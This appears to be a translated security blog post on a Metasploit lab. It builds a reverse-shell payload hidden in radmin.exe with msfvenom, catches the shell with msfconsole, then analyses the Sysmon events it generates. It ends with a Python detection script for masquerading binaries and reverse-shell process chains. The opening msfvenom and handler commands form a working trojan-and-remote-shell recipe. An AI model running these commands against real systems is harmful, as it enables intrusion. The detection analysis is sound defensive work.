Metasploit process injection: a Sysmon event collection example
阿新 • Published: 2022-04-21
Generate the payload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe
Run r2admin.exe on the target machine, and catch the reverse shell on the attacking machine with msfconsole:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.136
lhost => 10.10.10.136
msf5 exploit(multi/handler) > set lport 9876
lport => 9876
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.10.136:9876
[*] Command shell session 1 opened (10.10.10.136:9876 -> 10.10.10.166:50097) at 2020-07-15 23:45:36 -0400
pwd
pwd
'pwd' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
C:\Users\lovely\Desktop>whoami
whoami
lovely-pc\lovely
My own screenshot of running the steps above:
Looking at it, the process injection produced 3 events once it succeeded:
Process Create:
RuleName: -
UtcTime: 2022-04-21 07:10:32.488
ProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
ProcessId: 1988
Image: C:\Users\76194\meter.exe ==> the path carries the malicious file name
FileVersion: 3, 0, 0, 1
Description: Radmin Viewer ==> but the file description and the rest are Radmin's
Product: Radmin Viewer
Company: Famatech, Inc. ==> the company is Radmin's too
OriginalFileName: Radmin.exe ==> and so is the original file name!!! Seen this way, msf's process injection is just borrowing a host executable as a shell!!!???? (the -x option in the msfvenom command above embeds the payload in radmin.exe, so the PE version resource stays Radmin's while the on-disk name does not match it)
CommandLine: meter.exe ==> launched from the command line
CurrentDirectory: C:\Users\76194\
User: DESKTOP-UKAQ1J3\76194
LogonGuid: {f7ee4450-f98e-6260-0327-030000000000}
LogonId: 0x32703
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=7D7D702AE3DD202C691DE6C53D6EC09B,SHA256=4BC01EAF72B2651729D39B5A94BA6969D31A0DEF194467411852C063A069CAFA,IMPHASH=B57FE998F1E11811F80ABFD6E10DCF47
ParentProcessGuid: {f7ee4450-fb48-6260-9900-000000000500}
ParentProcessId: 5320
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\system32\cmd.exe"
ParentUser: DESKTOP-UKAQ1J3\76194

Process Create:
RuleName: -
UtcTime: 2022-04-21 07:10:32.530
ProcessGuid: {f7ee4450-0368-6261-1501-000000000500}
ProcessId: 428
Image: C:\Windows\SysWOW64\cmd.exe
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd
CurrentDirectory: C:\Users\76194\
User: DESKTOP-UKAQ1J3\76194
LogonGuid: {f7ee4450-f98e-6260-0327-030000000000}
LogonId: 0x32703
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A
ParentProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
ParentProcessId: 1988
ParentImage: C:\Users\76194\meter.exe ==> this shows cmd.exe was created as a child process for the reverse shell to use
ParentCommandLine: meter.exe
ParentUser: DESKTOP-UKAQ1J3\76194

Network connection detected:
RuleName: Usermode
UtcTime: 2022-04-21 07:10:32.520
ProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
ProcessId: 1988
Image: C:\Users\76194\meter.exe ==> the reverse shell's network connection event
User: DESKTOP-UKAQ1J3\76194
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.168.138
SourceHostname: DESKTOP-UKAQ1J3
SourcePort: 57194
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.168.96 ==> this is my msf remote-control machine
DestinationHostname: -
DestinationPort: 8800
Run a whoami command inside the reverse shell:
Its parent process is cmd.exe.
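The three events above, plus the whoami process chain, can be turned into a small correlation rule. The following Python script is an added example and not part of the original post or of Sysmon itself. It assumes Sysmon's plain "Field: value" message layout with one field per line; the sample log is constructed from the page's own three events trimmed to the fields the checks use, and the fourth record (whoami, with a placeholder GUID) is invented to stand in for the command run inside the reverse shell. It flags (1) a process whose on-disk name differs from its OriginalFileName, (2) a process that both spawned a shell and initiated an outbound connection, and (3) the ancestry chain of the whoami process:

```python
from collections import defaultdict
from pathlib import PureWindowsPath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed sample log in Sysmon's "Field: value" layout, one event per block.
# The first three records are the page's own events trimmed to the fields used
# here; the fourth (whoami) is invented, and its ProcessGuid is a placeholder.
SAMPLE_LOG = r"""
Process Create:
ProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
Image: C:\Users\76194\meter.exe
OriginalFileName: Radmin.exe
ParentProcessGuid: {f7ee4450-fb48-6260-9900-000000000500}
ParentImage: C:\Windows\System32\cmd.exe

Process Create:
ProcessGuid: {f7ee4450-0368-6261-1501-000000000500}
Image: C:\Windows\SysWOW64\cmd.exe
OriginalFileName: Cmd.Exe
ParentProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
ParentImage: C:\Users\76194\meter.exe

Network connection detected:
ProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
Image: C:\Users\76194\meter.exe
Initiated: true
DestinationIp: 192.168.168.96
DestinationPort: 8800

Process Create:
ProcessGuid: {00000000-0000-0000-0000-000000000001}
Image: C:\Windows\SysWOW64\whoami.exe
OriginalFileName: whoami.exe
ParentProcessGuid: {f7ee4450-0368-6261-1501-000000000500}
ParentImage: C:\Windows\SysWOW64\cmd.exe
"""


def parse_events(log):
    """One dict per event: 'EventType' holds the header line, other keys the fields."""
    events = []
    for block in log.strip().split("\n\n"):
        lines = block.strip().splitlines()
        event = {"EventType": lines[0].rstrip(":")}
        for line in lines[1:]:
            key, sep, value = line.partition(": ")
            if sep:
                event[key] = value.strip()
        events.append(event)
    return events


def image_name(path):
    return PureWindowsPath(path).name.lower()


def find_masquerades(events):
    """Event ID 1 records whose on-disk name differs from the PE version resource's
    OriginalFileName (meter.exe vs Radmin.exe). Renamed legitimate binaries trigger
    this too, so treat it as a lead to combine with the other signals."""
    hits = []
    for e in events:
        orig = e.get("OriginalFileName", "-")
        if e["EventType"] == "Process Create" and orig != "-":
            if image_name(e["Image"]) != orig.lower():
                hits.append((e["ProcessGuid"], image_name(e["Image"]), orig))
    return hits


def find_shell_with_network(events):
    """Processes that both spawned a shell (child Event ID 1) and initiated an
    outbound connection (Event ID 3): the reverse-shell shape seen above."""
    procs, children, conns = {}, defaultdict(list), defaultdict(list)
    for e in events:
        if e["EventType"] == "Process Create":
            procs[e["ProcessGuid"]] = e
            children[e["ParentProcessGuid"]].append(e)
        elif e["EventType"] == "Network connection detected" and e.get("Initiated") == "true":
            conns[e["ProcessGuid"]].append(e)
    hits = []
    for guid, cs in conns.items():
        shells = [c for c in children.get(guid, []) if image_name(c["Image"]) in SHELLS]
        if guid in procs and shells:
            hits.append({"image": procs[guid]["Image"], "shell": shells[0]["Image"],
                         "dest": f"{cs[0]['DestinationIp']}:{cs[0]['DestinationPort']}"})
    return hits


def ancestry(events, guid):
    """Walk ParentProcessGuid links upward from guid, returning image names up to
    the oldest ancestor in the log (recovers whoami -> cmd.exe -> meter.exe)."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventType"] == "Process Create"}
    chain = []
    while guid in procs:
        chain.append(image_name(procs[guid]["Image"]))
        guid = procs[guid].get("ParentProcessGuid")
    return chain


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print("masquerades:", find_masquerades(evs))
    print("shell+network:", find_shell_with_network(evs))
    print("whoami chain:", ancestry(evs, "{00000000-0000-0000-0000-000000000001}"))
```

On the sample log this reports meter.exe as a masquerade (its OriginalFileName is Radmin.exe), reports meter.exe as a process that spawned cmd.exe and connected out to 192.168.168.96:8800, and walks whoami back through cmd.exe to meter.exe. The ancestry walk stops at meter.exe because its parent's GUID is not in the sample, which is exactly the gap a real deployment fills by keeping the full Event ID 1 history.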